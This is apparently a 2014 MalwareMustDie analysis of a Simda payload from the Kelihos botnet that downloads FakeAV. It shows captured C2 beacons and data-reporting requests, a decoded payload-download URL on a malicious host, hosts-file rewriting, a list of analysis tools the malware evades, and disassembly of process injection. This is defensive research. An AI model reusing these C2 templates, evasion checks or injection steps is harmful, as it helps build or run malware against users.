MalwareMustDie

#MalwareMustDie - Decoding Kelihos Simda download FakeAV

Feb 10th, 2014
  1. // =========================================
  2. // #MalwareMustDie!
  3. // Kelihos botnet served payload analysis
  4. // Simda payload, downloader of FakeAV
  5. //
  6. @unixfreaxjp /malware/temp]$ date
  7. Mon Feb 10 21:14:53 JST 2014
  8. // =========================================
  9.  
  10. // first the sample info + VT link:
  11. -----------------------------------------------------------
  12. Sample : ./sample.mmd
  13. MD5    : 2cc3c5c253997c73781de81bf0cdd405
  14. SHA256 : bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9
  15. VT URL : https://www.virustotal.com/en/file/bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9/analysis/1392034168/
  16. Detection ratio: 31 / 50
  17. -----------------------------------------------------------
  18.  
  19. // main course...
  20.  
  21. //================================
  22. // Decoding of the CNC Traffic
  23. // Compare the traffic to reverse
  24. // binary result to get the crack
  25. // logic.
  26. //
  27. // Noted: I did this "my way"
  28. // Adding here and there analysis to -
  29. // find something new..
  30. //================================
  31.  
  32.  
  33. // ---------------------------------------
  34. // TRAFFIC #1
  35. // requesting for the setup beacon..
  36. // ---------------------------------------
  37.  
  38. GET /?7y31731=%96%C9%A5%A6%A6%D8c%AA%A6%97%9B%D8ll%9B%9
  39. 8%AFf%98m%CE%DE%5E%98%A3%A1%9D%DEi%93l%96%97%98%DC%E6%A
  40. C%E9%EA%86%C7%99%AA%9E%D7rffh%AFf%5B%A1%DB%E0k%C7%D4%9A
  41. z%C1Y%9E%A0%97n%A6%A9%B5%A5%B5%ADd%AD%ACwh%B4l%7Bmz%B1l
  42. wf%B3%AAa%A4%A3%B3n%BCwjjvW%E4%CA%E3%AC%A2%A4%5E%A7%A3h
  43. f%A3eeef%A9eee%9D%A9%5E%93%95%E3t%A9cagcb%B8%9B%96%E1%E
  44. C%B1a%A9%97 HTTP/1.1
  45. Host: report.ws55s5555y555my.com
  46. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  47.             Trident/4.0;
  48.             .NET CLR 2.0.50727;
  49.             .NET CLR 1.1.4322;
  50.             .NET CLR 3.0.04506.590;
  51.             .NET CLR 3.0.04506.648;
  52.             .NET CLR 3.5.21022;
  53.             .NET CLR 3.0.4506.2152;
  54.             .NET CLR 3.5.30729)
  55.  
  56. // Reversed..
  57. //...shows the domain (the same domain as captured)
  58.  
  59. 4258f0: report.ws55s5555y555my.com  <=== good, got the howtos here..
  60.  
  61. //next...with cracked urls:
  62. 4114f8: /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 <== #w000t!!
  63.  
  64. //templates:
  65. $%s&controller=sign&data=%s&oldmid=%s&mid=%s$
  66.  
  67. // ---------------------------------------
  68. // TRAFFIC #2
  69. // POSTING the Infection PC ID..
  70. // ---------------------------------------
  71.  
  72. POST / HTTP/1.1
  73. Host: report.ws55s5555y555my.com
  74. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  75.             Trident/4.0;
  76.             .NET CLR 2.0.50727;
  77.             .NET CLR 1.1.4322;
  78.             .NET CLR 3.0.04506.590;
  79.             .NET CLR 3.0.04506.648;
  80.             .NET CLR 3.5.21022;
  81.             .NET CLR 3.0.4506.2152;
  82.             .NET CLR 3.5.30729)
  83. Content-Length: 5476
  84. Content-Type: application/x-www-form-urlencoded
  85.  
  86. 31yWS=%96%97%D1%D3%A3%AA_%AA%A7hi%D6feg%97%A9eln%CE%B1b
  87. %94%D3%CE%94%96%AC%BB%88%A2%95%96%E1%D3%EBk%EA%E1fe%A3n
  88. gnn%AFmi%94%E4%E2_%95%A8%A5ic%B2%8C%84%A2%9E%A1%9F%AB%A
  89. 7e%AC%A3%94%A4%E0kkhf%B2nik%A1%A9%5E%95%A0%A5ib%B2%8B%8
  90. 8%A9%9D%A6%9F%A3%AC%8F%AE%A3%98b%D8%96%9Aib%ADeil%9A%DA
  91. d%9C%A6%9A%95%97%DC%8D%B6%A8%96%A2%A8%D6%A7%91%D6%D2if%
  92. A7iebi%AAibi%9E%ADb%93%A7%A2%60e%AA%8B%87%A2%C4%CF%A2%A
  93. 4%AD%5E%AD%ABfj%A5%5B%AC%ABr%F0%AB%8D%85%93%EE%97%C7%AC
  94. %9Edd%AF%88y%DE%D3%D7%AC%D6%D9%5B%BA%BB%5B%A2%DC%99riy%
  95. BEkxn%A3%AFg%A5%A2%AEjw%B1%9C%8B%A9%A7%A1%B5%A3%A7o%AB%
  96. B9lx%B7nhx%5B%EB%9A%A8r%9D%A9%5E%93%9F%A0da%A9%87%83%A3
  97. %95%A0%9F%A2%A4%5E%A7%A3%5B%AB%B0eeee%A9f%7Bk%93%EB%A8%
  98. A0%A2%9FY%A3%DE%C7%C2%E4%D9%AD%C2%E1%DA%A2%C0%E1%A8%A9%
  99. D4%A1%A1%5B%A8%E8%9B%A9r%AE%DD%9D%C5%D4%8Dy%9D%DA%CA%BB
  100. %92%B5%DC%D0%EB%D9%A0%97%A4fU%B4%98%A9%9E%AB%DE%8DB%3F%
  101. AE%CDw%83%9C%8Dw%9A%DE%C5%C6%E6%D5%E2%DE%D9%E6%8F%E4%E0
  102. U%AF%E8%A7Uy%9A%E2%A3%A8%A9%CE%E5%9A%C4%E3%D6%A2%9F%99%
  103. BB%B8%E4%85%C3%DE%D8%E8%A5%D8%E5%9AB%7Dv%AA%A9%A4%C2%A9
  104. U%AB%A0%A7a%91%A7%9Bd%3E%83%9A%96%DE%CA%D1%DD%D7%E6%3B%
  105. 81%BC%A3%A9%D8%A1%5D%87%5E%99%7C%A7%96%DD%E1%97%C6%E2%8
  106. D%80%96%DD%C0%B4%92%A6%D3%D2%D7%E0%93%E9%D4%A9%A4%E5Uy%
  107. A7%9E%EF%9A%A7Bw%C2%9C%D7%D4%D9%E1Q%C6%B8%C1%D3%CC%D5%D
  108. C%D7%E2%A2%A4%B8%A3%9C%DC%A3%9Ab~%E7%A9%9A%A7%D3%DA%91%
  109. C8%7Cw%8A%9A%E7%BB%C2%E9%D8%90%B8%E0%E8%93%E9%E1%9A%A9%
  110. 93z%AD%A5%A1%E8%A7%9A%A7%8D%B1%3Bm%C2%D6%96%99%DE%C9%BB
  111. %D7%CE%E4%E2%E7%E4%92%D8%E7%9AU%D9%31%A7U%8C%E2%A3%99%A
  112. 4%E4%ECN%AC%DD%E1%98%A3%E7%BC%C7%92%AA%E8%DF%DE%E3%A0%D
  113. C%E5Um%93%5D%80wg%ADnlk%A1%A9Wpy%C0%9C%94%E1%BC%C5%DA%C
  114. A%D9%E3%E5%E9%9E%DB%D4%A9%9A%93%9B%31%A7U%D0%9E%A3%99%D
  115. C%F0%A1%83%B8%DB%A7%96%EB%C5%B8%E6%85%B5%E7%E2%E0%9D%E9
  116. %D8%A7U%ABU%5D%80w%ABjfe%A2%AC_%8C%7Cw%7B%A0%ED%BD%BC%E
  117. A%85%D6%6B%E4%94%85%E0%E1%99%A4%EA%A8U%8D%85%99%5D%80w%
  118. A6%AFg%93%A7%A1%5C%3E%83%A0%C1%E6%CA%DC%1D%92%B5%91%EB%
  119. DC%AB%9A%A0%82%96%A3%96%E0%9A%A2%9A%DB%ED%5B%B7%D4%D0%9
  120. B%9F%E8%C3%C2%D9%CE%D5%7C%7C%C1%97%DA%E5%A4%A8%E2%9B%A9
  121. Uc%C7z%89U%B3%EB%8F%D0%D4%E4%A2%A3%E4w%86%A0%9A%90%BB%D
  122. 3%E2%95%EC%D4%9C%9A%93%85%96%98%A0%99%88%85f%8D%A6N%A7%
  123. B4%C2%40%3B%C6%C0%B6%E4%D4%E3%DE%D8%E8N%A5%C1z%89%93%7B
  124. %A7%96%A2%DE%AC%A4%A7%D8%99a%91%A4%8D%86%81%AAd%5D%BF%C
  125. E%D3%E1%E1%E7%9D%DD%E7Ux%E2%A2%A5%A7%9A%EC%A8%9E%A4%DB%
  126. 99q%CF%D8%D2%A1%A5%99%A7%B4%D5%D0%90%A0%A0%A4N%DD%E2%A7
  127. U%CA%9E%A3%99%A4%F0%A8U%8D%BD%868%BA%D8%DB%97%A0%F0%CAs
  128. %BF%CA%D4%D8%D3%94t%E6%E5%A2%96%E7UffU%EB%AA%A3%A9%D6%E
  129. 6%93py%C4%9C%9F%DD%C6%CA%E5%85%BD%D4%D6%DD%8F%97%C3%A1%
  130. 96%EC%9A%A7Uf%AAB%3F%82%D6%DC%A0%D2%E2%DC%99%A5%99%AC%C
  131. 6%D7%D7%9D%BC%E1%D8%93%97%B7%A7%9E%E9%9A%A7U%7B%EB%96%A
  132. 2%9A%E4%E8%A0%CE%8F%B3%98%92%ED%CC%C5%D7%85%C0%D0%D5%DF
  133. N%A8%A1eB%7D~%A3%A9%9A%E5%5D%87%5E%8D%C9%80%B2%8F%BB%98
  134. %A5%F0%C6%C5%DD%85%B3%DE%E0%E2%93%DA%E7%9E%A4%E1%A8Ufg%
  135. A7fcf%9F%A7%5Epy%BA%9C%94%EB%C6%C6%E1%CB%E4%8F%C1%DA%94
  136. %E0%D6%9AU%C3%A7%A4%9B%9A%EC%A8%9E%A4%DB%DA%9A%83%B4%D1
  137. %9C%A5%E2%C6%C1%92%97%A0%9F%A5%818%CE%DC%A3%97%E2%A3%99
  138. U%89%C9%82Uy%D2%EF%97%C6%D4%8Dw%A3%E2%CD%B8%E4rz%C6%DB%
  139. E2%92%E6%EA%A8U%B7%9A%9B%9A%A3%DD%9A%A7Bw%C6%97%C6%E1%D
  140. C%A6%A0%DF%CBs%A0%B3%B5%C3%92%BA%A0%D8%E0%9A%AC%E2%A7%A
  141. 0Uh%A7eU%88%D2%EB%A4%CC%D2%D2S%81%DA%BA%BE%92%97%7Dy%B3
  142. %D8%9D%D9%D8U%87%D8%96%99%9A%A7%99nci%9B%A9%3Bm%BC%D6%9
  143. 6%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0%9A%AC
  144. %A4%A7%E4Ugc%9D%99%81%C8%E1%E3%9C%94%DEw%A3%D3%C8%DB%8F
  145. %A4%818%C4%DC%98%A7%E2%A8%A4%9B%A9%99c%83z%C1%99t%D5%D0
  146. %DA%98%A8%E8%C9%BE%92%98%9E%9F%92%C7%93%E9%E9%9E%98%D8U
  147. %85%96%98%E4UgU%B9%DA%9C%CA%E4%CE%9A%96%99%A7%B4%D5%D0%
  148. 90%9C%92%B8s%CC%80%3F%82%DC%98%A7%A4%A8%E8%9B%A9U%9B%C7
  149. s%B7%8F%B3%A5%92%E6%BC%CA%E1%D7%DB%8F%A4%A2%5E%97%C6%9A
  150. %A7%E9%9E%98%9AU%C9%96%98%A0%8D%ABN%AF%D0%DB%9A%A6%DA%B
  151. E%B8%92%B5%D1%D2%DD%94%5B%97%B7z%8A%80%3F%89%AC%9A%DA%A
  152. 0%AA%9E%8D%C9%9D%DA%D4%DF%A7%A0%F2w%B9%E1%D7%90%C6%DB%E
  153. 2%92%E6%EA%A8U%CB%85B%3F%88%DE%98%AA%A7%D6%ED%A7%83%C4%
  154. DD%97%92%ED%BCs%D8%D4%E2%8F%BF%DD%91%E9%E2%A8%A4%D9%A9U
  155. c%83%BE%89U%7B%DF%DA%9B%C8%E6%DC%A5%9C%99%8A%81%A7%85%C
  156. 3%BF%A3%94V%C2%B5gi%A4kilh%A2B%3F%7D%DC%ED%94%CC%E7%8D%
  157. 99%A0%EBw%A0%DB%C8%E2%DE%E5%E3%94%EB%93c%83%B8%89U%7B%A
  158. 7%DA%A2%9A%AC%DC%EB%99%83%A2%9BhQ%CC%A7%84%92%8D%BB%B1%
  159. AB%A9a%AC%ACj%5E%80%3F%7D%A4%A9%DF%9E%ADU%D3%E8%A0%83%B
  160. C%D6%96%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0
  161. %9A%AC%A4%A7%E4Uhc%A2%99%81%B3%A0%8D%5B%7C%BB%90%88%AA%
  162. 99%A8%A3%9B%818%CA%E2%AA%A3%D7%82v%8DB%83%82%9E%98%DF%E
  163. 8%A1%D2%D5%E1S%87%E2%CA%C8%D3%D1%90%B2%9D%9FN%A9%A3fe%9
  164. 3U%ADmk%99%87%9A%99%D6%EC%A2%D5%D8%CF%A8%A5%DA%B9%BF%D7
  165. %85%9D%8F%A3%A4%5C%A7%A1ie%A5fnB%3F%9F%A5%A7%A4%D0%B6%8
  166. 9%B6%E8%E0%A7%96%E6w%A3%E4%D4%D3%D4%E5%E7%8B%84%7D%88%A
  167. E%E6%A9%9A%A2B%83%A8%A2%A8%E0%A7%93%DB%D4z%3D%94%EC%C9%
  168. C6%E5%93%D5%E7%D7%818%EE%DC%A3%A1%E2%9C%A4%A3c%DE%AD%9A
  169. Bw%EC%93%D5%E5%D6%96%96%EC%85%B8%EA%CA%7Dy%DE%E7%8F%EA%
  170. E6c%9A%EB%9AB%3Fy%BF%88%9A%A7%E3%A7%93%DB%D4z%3D%A4%EF%
  171. BA%BB%E1%D8%E4%9D%D7%EC%93%84%7D%A8%AB%D6%9D%A4%A8%A9%A
  172. 7%9A%AD%9Az%83%A1%D9%D2%D5%A2%A4%ED%85%B8%EA%CA%7Dy%E5%
  173. EA%91%DF%E2%A8%A9%A1%9A%AD%9AB%83%9A%AD%A5%D9%E8%A0%C8%
  174. E1%9B%98%A9%DEd%5D%E5%D5%DF%DE%DE%E7%A4%A5%D8%AD%9A%80%
  175. 3F%A8%A2%96%F1i%A5%A3%DD%A7%93%DB%D4z%3D%84%C6%B8%CB%A6
  176. %93%D5%E7%D7%818%DA%E7%9B%A2%E2%A3c%9A%AD%DEB%3F%A7%E2%
  177. E7%92%CF%DB%A0e_%DE%CF%B8%7Fo%E3%E5%D5%DC%9D%EA%E7c%9A%
  178. EB%9AB%3F%96%ED%98%9D%A0%E0%EB%A4%91%D4%E5%98%3E%83%A3%
  179. A0%C5%93%D5%E7%D7%818%CC%C1%88c%D8%AD%9AB%3F%DA%A1%9Cc%
  180. D2%F1%93py%B3%A5%AB%CC%CB%B4%E6%CA%A2%DA%A0%D9%A6%DC%80
  181. %3F%AC%E0%9E%A5%A7%AB%EC%9Ac%9A%E5%DE%3Bm%C2%E6%A6%A5%D
  182. E%C4%60%7C%B8%E9%E2%E6%D9%9B%84%7D%88%AE%E6%A9%9A%A2B%8
  183. 3%88%AE%A8%E1%DE%9Bpy%C0%AC%A4%ED%BC%C0%7Fo%E7%DC%DB%E4
  184. %A0%ED%E6%9Ac%D8%AD%9AB%3F%CC%AE%A8%A9%D2%E6%3Bm%D0%D4%
  185. A1%96%EC%CB%BC%A0%CA%E8%D4%7F~R
  186.  
  187. // Template of this POST command is:
  188.  
  189. 410fe8: POST %s HTTP/1.1  Host: %s  User-Agent: %s  
  190.         Content-Length: %d  
  191.         Content-Type: application/x-www-form-urlencoded    
  192.         %s
  193.  
  194. // decrypted values are:
  195.  
  196. 4259f0: wv=wvXP&
  197.         uid=11361&
  198.         lng=de-CH&
  199.         mid=4DE6C9669B3A7F8E87B1F13A4F7CD93C&
  200.         res=00000320000100000000&
  201.         v=000001F6
  202.         &rz=32
  203.  
  204. //template grabbed in reversing:
  205. 411198: wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X&rz=%d
  206.  
  207. // [...] and so on.. (I think the above is enough evidence..)
  208. // Obviously, the infected PC's information was sent..
  209.  
  210.  
  211. // ---------------------------------------
  212. // REQUEST #3
  213. // Here goes the FakeAV mess....
  214. // ---------------------------------------
  215.  
  216. GET /?de=kayoyZWnmmKfmJikqpfJ2m6nl2qmpGeZ0qTZ0cnCqZuRkc
  217. jS3evY0%2BCk1KZ26NiV0ZXR1uTFnsfZY9KazZ%2FiqZ3NdZWjpdncl
  218. 8espK3VmJSpmWKempiiqMvKqnDSZWqqqGTGptHW1cWWqshU2M7HrKuq
  219. qap7qGpvrrFhpKazrbWcmLaWdJyYpKO9nae4caJ3XQ%3D%3D HTTP/1.1
  220.  
  221. Host: update.kecowfdt8o49uo.com  // does not exist!!
  222. User-Agent: Mozilla/5.0 (Windows NT 6.1;
  223.             WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
  224. Connection: Keep-Alive
  225.  
  226. // Reversed...
  227.  
  228. Coded template:
  229. 410ac8: update%s.%s.com <=== now we know how the decoded form is built
  230.  
  231. // Thanks to the hosts-file overwrite, the access reached the mother host!!
  232. // Response:
  233.  
  234.  
  235. HTTP/1.1 200 OK
  236. Server: nginx
  237. Date: Mon, 10 Feb 2014 10:07:09 GMT
  238. Content-Type: text/html
  239. Transfer-Encoding: chunked
  240. Connection: close
  241. X-Powered-By: PHP/5.3.16
  242.  
  243. 80
  244.  
  245. 2513465194980a70c6d814d5db21b2432f5b82a099664ea242f5bd0
  246. 20459550cb45a50e1c47aac060a347d652cf549e2869ddb7e020995
  247. 2b573f8a370fe58f9d
  248. 0
  249.  
  250.  
  251. // so ..hostname are encoded..
  252. // cracked:
  253.  
  254. http://update1.highguarded.com  // <=== #w00tw00t!!
  255.  
  256. // The GET request uses a different encoding as well; cracked:
  257. /?abbr=RTK&action=download&setupType=drop64&setupFileName=dropper64.exe  #w00tw00t!!
  258.  
  259. //PoC:
  260. http://urlquery.net/queued.php?id=65248966
  261. https://www.virustotal.com/en/url/8363fdd4899e1f544f4f2b626ce985be85f4cfab0e62ce3f33ac05df4b496280/analysis/1392037874/
  262.  
  263. // traces of binary saved:
  264. 4114b5: %temp%\11361.sys
  265. 4114a8: %temp%/update_c1eec.exe
  266. 4123c8: %appdata%\ScanDisc.exe
  267. // maybe changes (random), it has seeds.. go figure?
  268.  
  269. // PS: These "WannaFoolMe" requests are fakes.. Noted: MMD is not that easily fooled:
  270.  
  271. 411394: Host: update1.randomstring.com  User-Agent: IE7  
  272. 411394: Host: update1.randomstring.com  User-Agent: IE7  
  273. 411554: Host: update1.randomstring.com  User-Agent: IE7  
  274. 4114c4: Host: update1.randomstring.com  User-Agent: IE7  
  275. [...]
  276.  
  277. //---------------------------------------
  278. // ETC TRAFFIC...
  279. // AND THE NEXTS (REQUEST OF SAME PATTERN)
  280. // ---------------------------------------
  281.  
  282. GET /?I17q20=%96%C6%A6%A6%A6%D9%60%AF%A3el%D8%9B%99hj%A
  283. C%96im%D2%DCe%96%D1%A2%7C%97k%A6bh%D6%8B%E7%E5%AF%EB%A4
  284. %CF%C3%5B%AA%DC%99rff%ACkf%5B%D9%E7%95%A0%D3%D2vt%7F%97
  285. %9F%99%D6%A2%A4%B3%B7%AAq%B0%A9kn%B5hvl%7B%B1zml%AF%AAt
  286. %94%A2%AE%7Dwn%B4vi%A5%A8%96%E1%D7%E7k%A7%A3ee%A3geee%A
  287. 9efe%9D%A9%5E%93%9F%9DyW%AD%AEb%60%A2%95%A0%A0%B8%AAT%E
  288. 9%EDrh%A5Y HTTP/1.1
  289.  
  290. Host: report.ws55s5555y555my.com
  291.  
  292. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  293.             Trident/4.0;
  294.             .NET CLR 2.0.50727;
  295.             .NET CLR 1.1.4322;
  296.             .NET CLR 3.0.04506.590;
  297.             .NET CLR 3.0.04506.648;
  298.             .NET CLR 3.5.21022;
  299.             .NET CLR 3.0.4506.2152;
  300.             .NET CLR 3.5.30729)
  301.  
  302. (( no response..is a beacon, leave it!))
  303.  
  304.  
  305. // Autoruns..
  306. 413fb0: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  307.  
  308. // Spam trace???.. hmm..not good!!
  309. //..partial decoded strings..
  310. 41134c: v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
  311.  
  312.  
  313. // payload was checking these applications:
  314.  
  315.  EtherD.exe
  316.  Regshot.exe
  317.  ollydbg.exe
  318.  ZxSniffer.exe
  319.  Syser.exe
  320.  CamRecorder.exe
  321.  wspass.exe
  322.  SymRecv.exe
  323.  SbieSvc.exe
  324.  ERDNT.exe
  325.  SandboxieDcomLaunch.exe
  326.  irise.exe
  327.  IrisSvc.exe
  328.  vba32arkit.exe
  329.  DrvLoader.exe
  330.  SUPERAntiSpyware.exe
  331.  %appdata%\ScanDisc.exe
  332.  VBoxTray.exe
  333.  tcpdump.exe
  334.  SandboxieRpcSs.exe
  335.  CamtasiaStudio.exe
  336.  ERUNT.exe
  337.  Sniffer.exe
  338.  wireshark.exe
  339.  dumpcap.exe
  340.  VBoxService.exe
  341.  cv.exe
  342.  Aircrack-ngGui.exe
  343.  WinDump.exe
  344.  observer.exe
  345.  windbg.exe
  346.  PEBrowseDbg.exe
  347.  
  348.  
  349. // here is the spot responsible for getting the payload URL..
  350. // the "hosts" file rewriting trace
  351.  
  352. 413010: # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  353.         # source server
  354. 412c74: # Copyright (c) 1993-2006 Microsoft Corp.
  355. 413060: # This file contains the mappings of IP addresses to host names. Each
  356. 4131f4: # lines or following the machine name denoted by a # symbol.
  357. 412de0: # The IP address and the host name should be separated by at least one
  358. 412e2c: # space.
  359. 412ef8: #      102.54.94.97     rhino.acme.com
  360. 412f40: #       38.25.63.10     x.acme.com              # x client host
  361. // added nasty stuff to download from update.kecowfdt8o49uo.com
  362.  
  363.  
  364. // Post Installation contacted IP:
  365. IP              PORTS
  366. ------------------------
  367. 5.61.32.192 22
  368. 79.142.66.240   22 80 443
  369. 5.149.248.85    22 80
  370. 92.123.68.97    80 443
  371.  
  372. // IP GEO info:
  373. 5.61.32.192||16265 | 5.61.32.0/20 | LEASEWEB | DE | 3NT.COM | 3NT SOLUTIONS LLP
  374. 79.142.66.240|hosted-by.altushost.com.|60778 | 79.142.64.0/22 | FELICITY | NL | ALTUSHOST.COM | ALTUSHOST B.V.
  375. 5.149.248.85||59711 | 5.149.248.0/23 | FORTUNIX | NL | HOSTZEALOT.COM | FORTUNIX NETWORKS L.P.
  376. 92.123.68.97|a92-123-68-97.deploy.akamaitechnologies.com.|1299 | 92.123.68.0/24 | TELIANET | GB | AKAMAI.COM | AKAMAI TECHNOLOGIES
  377.  
  378.  
  379. // ADDITIONALS..PERSONAL MEMOs....
  380.  
  381. // OpenSearch XML in the binary builder for traces??? #LOL
  382.  
  383. 40c674: </Arguments      </Exec    </Actions  </Task  <!--00--  
  384. 40c3ec: <Actions
  385. 4138bc: <Param name="q" value="{searchTerms}"/
  386. 4134bc: <DescriptionSearch for the best price.</Description
  387. 413540: <Image width="16" height="16"%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8
  388. 41384f: e2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image
  389.  
  390. // Code injection w/WriteProcessMemory(KERNEL32.DLL)
  391.  
  392. Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
  393. ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
  394. or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
  395. moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
  396. SingleObject,CloseHandle
  397.  
  398. 0x40930F    call dword ptr [0x40C0C8h]      "VirtualAllocEx@KERNEL32.DLL" (Import, 5 Params)
  399. 0x409315    mov esi, dword ptr [0x40C180h]  "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  400. 0x40931B    mov dword ptr [ebp-08h], eax   
  401. 0x40931E    call esi                    "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  402. 0x409320    mov dword ptr [ebp-0Ch], eax   
  403. 0x409323    cmp dword ptr [ebp-08h], ebx   
  404. 0x409326    jne 0x40933Dh   target: 0x40933D
  405. 0x409328    push dword ptr [ebp-04h]   
  406. 0x40932B    call dword ptr [0x40C130h]      "CloseHandle@KERNEL32.DLL" (Import, 1 Params)
  407. 0x409331    mov dword ptr [004257ECh], 00000007h   
  408. 0x40933B    jmp 0x4093B2h   target: 0x4093B2
  409. 0x40933D    push ebx    xref: 0x409326
  410. 0x40933E    push edi   
  411. 0x40933F    push dword ptr [ebp+08h]   
  412. 0x409342    mov edi, dword ptr [ebp-04h]   
  413. 0x409345    push dword ptr [ebp-08h]   
  414. 0x409348    push edi   
  415. 0x409349    call dword ptr [0x40C0BCh]      "WriteProcessMemory@KERNEL32.DLL" (Import, 5 Params) ?? <=== here..
  416. 0x40934F    test eax, eax  
  417.  
  418.  
  419. // Code Execution via "ShellExecuteW"
  420.  
  421. Code function: 0_2_0x4033C0 DialogBoxParamW,memset,mems
  422. et,memset,wcsstr,wsprintfW,ExpandEnvironmentStringsW,Co
  423. pyFileW,wsprintfW,ShellExecuteW,GetLastError,
  424.  
  425. 0x4033C0    push ebp    xref: 0x402626
  426. 0x4033C1    mov ebp, esp   
  427. 0x4033C3    sub esp, 00000618h 
  428. 0x4033C9    push esi        "DialogBoxParamW@USER32.DLL" (Import, 5 Params)
  429. 0x4033CA    push edi   
  430. 0x4033CB    xor eax, eax   
  431. 0x4033CD    mov esi, 00000206h 
  432. 0x4033D2    push esi   
  433. 0x4033D3    xor edi, edi   
  434. 0x4033D5    mov word ptr [ebp-00000208h], ax   
  435. 0x4033DC    lea eax, dword ptr [ebp-00000206h] 
  436. 0x4033E2    push edi   
  437. 0x4033E3    push eax   
  438. 0x4033E4    call 0x40B208h  "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
  439. 0x4033E9    xor eax, eax   
  440. 0x4033EB    push esi   
  441. 0x4033EC    mov word ptr [ebp-00000410h], ax   
  442. 0x4033F3    lea eax, dword ptr [ebp-0000x40Eh] 
  443. 0x4033F9    push edi   
  444. 0x4033FA    push eax   
  445. 0x4033FB    call 0x40B208h  "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
  446. 0x403400    xor eax, eax   
  447. 0x403402    push esi   
  448. 0x403403    mov word ptr [ebp-00000618h], ax   
  449. 0x40340A    lea eax, dword ptr [ebp-00000616h] 
  450. 0x403410    push edi   
  451. 0x403411    push eax   
  452. 0x403412    call 0x40B208h  memset@MSVCRT.DLL (Import, 0 Params) target: 0x40B208
  453. 0x403417    push 00413EA0h  UTF-16 "Temp\Low"
  454. 0x40341C    mov esi, 00414910h  UTF-16 "C:\agnesti.exe"
  455. 0x403421    push esi    UTF-16 "C:\agnesti.exe"
  456. 0x403422    call dword ptr [0x40C370h]  "wcsstr@MSVCRT.DLL" (Import, Unknown Params)
  457. 0x403428    add esp, 2Ch   
  458. 0x40342B    test eax, eax  
  459. 0x40342D    je 0x40348Bh    target: 0x40348B
  460. 0x40342F    push 00000009h 
  461. 0x403431    lea eax, dword ptr [ebp-00000410h] 
  462. 0x403437    push eax   
  463. 0x403438    push 00000005h 
  464. 0x40343A    pop eax
  465. 0x40343B    call 0x4068FEh  target: 0x4068FE
  466. 0x403440    lea eax, dword ptr [ebp-00000410h] 
  467. 0x403446    push eax   
  468. 0x403447    push 00413EB4h  UTF-16 "%TEMP%"
  469. 0x40344C    lea eax, dword ptr [ebp-00000618h] 
  470. 0x403452    push 00413EC4h  UTF-16 "%s\%s.exe"
  471. 0x403457    push eax   
  472. 0x403458    call dword ptr [0x40C248h]  "wsprintfW@USER32.DLL" (Import, 0 Params)
  473. 0x40345E    add esp, 10h   
  474. 0x403461    push 00000104h 
  475. 0x403466    lea eax, dword ptr [ebp-00000208h] 
  476. 0x40346C    push eax   
  477. 0x40346D    lea eax, dword ptr [ebp-00000618h] 
  478. 0x403473    push eax   
  479. 0x403474    call dword ptr [0x40C1A4h]  "ExpandEnvironmentStringsW@KERNEL32.DLL" (Import, 3 Params)
  480. 0x40347A    push edi   
  481. 0x40347B    lea eax, dword ptr [ebp-00000208h] 
  482. 0x403481    push eax   
  483. 0x403482    push esi    UTF-16 "C:\agnesti.exe"
  484. 0x403483    call dword ptr [0x40C16Ch]  "CopyFileW@KERNEL32.DLL" (Import, 3 Params) //<== See??
  485. 0x403489    jmp 0x4034A1h   target: 0x4034A1
  486. 0x40348B    push esi    UTF-16 "C:\agnesti.exe" xref: 0x40342D
  487. 0x40348C    lea eax, dword ptr [ebp-00000208h] 
  488. 0x403492    push 00413ED8h 
  489. 0x403497    push eax   
  490. 0x403498    call dword ptr [0x40C248h]  "wsprintfW@USER32.DLL" (Import, 0 Params)
  491. 0x40349E    add esp, 0Ch   
  492. 0x4034A1    push 00000003h  xref: 0x403489
  493. 0x4034A3    push edi   
  494. 0x4034A4    push 00413B60h  UTF-16 "/param"
  495. 0x4034A9    lea eax, dword ptr [ebp-00000208h] 
  496. 0x4034AF    push eax   
  497. 0x4034B0    push 00413EE0h  UTF-16 "runas"
  498. 0x4034B5    push edi   
  499. 0x4034B6    call dword ptr [0x40C21Ch]  "ShellExecuteW@SHELL32.DLL" (Import, 6 Params) // <=== See??
  500. 0x4034BC    cmp eax, 20h   
  501. 0x4034BF    jnle 0x4034C9h  target: 0x4034C9
  502. 0x4034C1    call dword ptr [0x40C180h]  "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  503. 0x4034C7    mov edi, eax   
  504. 0x4034C9    mov eax, edi    xref: 0x4034BF
  505. 0x4034CB    pop edi
  506. 0x4034CC    pop esi
  507. 0x4034CD    leave  
  508. 0x4034CE    ret     function end
  509.  
  510.  
  511. // Remote process (read: thread) writing:
  512.  
  513. Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
  514. ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
  515. or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
  516. moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
  517. SingleObject,CloseHandle,
  518.  
  519. 0x409371    push 0x40CAB8h  ASCII "LoadLibraryW"
  520. 0x409376    push 0x40CAC8h  UTF-16 "kernel32"
